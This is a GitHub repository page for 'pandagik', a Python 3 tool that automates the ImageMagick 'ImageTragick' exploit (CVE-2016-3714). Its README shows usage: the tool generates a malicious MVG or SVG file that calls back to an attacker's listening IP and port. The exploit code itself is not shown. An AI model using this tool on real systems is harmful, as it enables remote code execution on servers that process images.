Skip to content

MrrRaph/pandagik

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 

Repository files navigation

pandagik

Author: Raphael Dray

Image Magick Exploit (CVE-2016-3714) automated in Python 3.

Usage:

❯ python3 pandagik.py -h
usage: pandagik.py [-h] (--mvg | --svg) LHOST LPORT

ImageTragick Exploit

positional arguments:
  LHOST       Listening IP
  LPORT       Listening Port

options:
  -h, --help  show this help message and exit

File Type:
  --mvg       MVG File
  --svg       SVG File

You can either generate a MVG (--mvg) or a SVG (--svg):

python3 pandagik.py --mvg 192.168.13.37 1337

About

Image Magick Exploit for CVE-2016–3714

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages